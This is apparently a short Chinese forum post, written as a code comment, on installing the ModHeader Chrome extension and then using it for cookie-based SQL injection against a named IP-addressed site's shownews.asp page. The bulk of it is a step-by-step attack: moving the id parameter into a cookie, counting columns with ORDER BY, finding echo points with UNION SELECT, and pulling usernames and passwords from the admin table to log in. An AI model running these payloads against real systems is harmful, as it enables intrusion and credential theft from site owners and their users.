|
|
/*
ModHeader 使用
前景提要:在chrom 上安装 插件 :
点击右上角-》更多设置-》扩展程序
开启开发者模式后, 将.crx 的文件直接拖拽到 屏幕上即可
参考网址:http://www.cnplugins.com/tool/three-methods-to-install-crx.html
开启时:因为做了改动,所以值不对, 建议单独开启无痕模式
爆破实例1:
爆破网址:
1. 原新闻网址: http://120.203.13.75:8001/shownews.asp?id=171
2. 去参后: http://120.203.13.75:8001/shownews.asp 【刷新页面 提示报错】
3. 将原有参数 id=171 写入Cookie -> 刷新页面 【页面正常显示,则代表 该cookie 中传入的参数被接收】
4. 测试 注入语句是否通过: 在Cookie中写入: id=171+order+by+10 【显示正常】
在Cookie中写入: id=171+order+by+11 【显示错误】 则表示 可以在cookie中对此进行sql 注入
5. 回显寻找 在Cookie中写入: id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin 【页面出现多处回显】
【其实这1-10 也是顺序、 也是一种占位符的概念】
6. 猜字段查询 在Cookie中写入: id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin 【页面出现多处回显】
7. 得到密码后 找到登录界面
*/
|
|
发表于 2019-3-2 17:03:44